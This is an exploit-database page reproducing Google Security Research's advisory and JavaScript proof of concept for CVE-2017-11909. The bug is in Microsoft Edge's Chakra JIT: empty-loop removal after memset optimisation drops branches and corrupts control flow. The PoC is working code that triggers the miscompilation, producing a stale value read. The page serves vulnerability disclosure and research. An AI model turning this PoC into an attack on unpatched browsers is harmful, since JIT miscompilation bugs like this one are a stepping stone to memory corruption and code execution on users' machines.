[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Microsoft Edge Chakra JIT - BackwardPass::RemoveEmptyLoopAfterMemOp Does not Insert Branches

Author
Google Security Research
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-29408
Category
dos / poc
Date add
09-01-2018
CVE
CVE-2017-11909
Platform
windows
/*
The optimizations for memory operations may leave empty loops as follows:
 
for (let i = 0; i < arr.length; i++) {
    arr[i] = 0;
}
 
Becomes:
 
Memset(arr, 0, arr.length);
for (let i = 0; i < arr.length; i++) {
    // empty!
}
 
These empty loops will be removed by "BackwardPass::RemoveEmptyLoopAfterMemOp". But this method just removes them without considering branches.
 
Here's what may happen.
 
A:
Memset(arr, 0, arr.length);
 
for (let i = 0; i < arr.length; i++) {
     
}
goto D;  // Actually, this's a "BrGe_I4" instruction in the PoC.
 
C:
...
 
D:
...
 
Becomes:
 
A:
Memset(arr, 0, arr.length);
 
C:
...
 
D:
...
 
So, this may break the control flow.
 
 
PoC:
*/
 
function opt(a, b, always_true = true) {
    a[0] = 1234;
    b[0] = 0;
 
    let arr = a;
    if (always_true) {
        arr = b;
        for (let i = 0; i < arr.length; i++)
            arr[i] = 0;
    }
 
    let val = arr[0];
    if (val) {
        print(val);  // Must be 0, but prints out 1234
        return true;
    }
 
    return false;
}
 
let a = new Uint32Array(1);
let b = new Uint32Array(0x1000);
for (let i = 0; i < 10000; i++) {
    if (opt(a, b)) {
        break;
    }
}

#  0day.today [2024-12-26]  #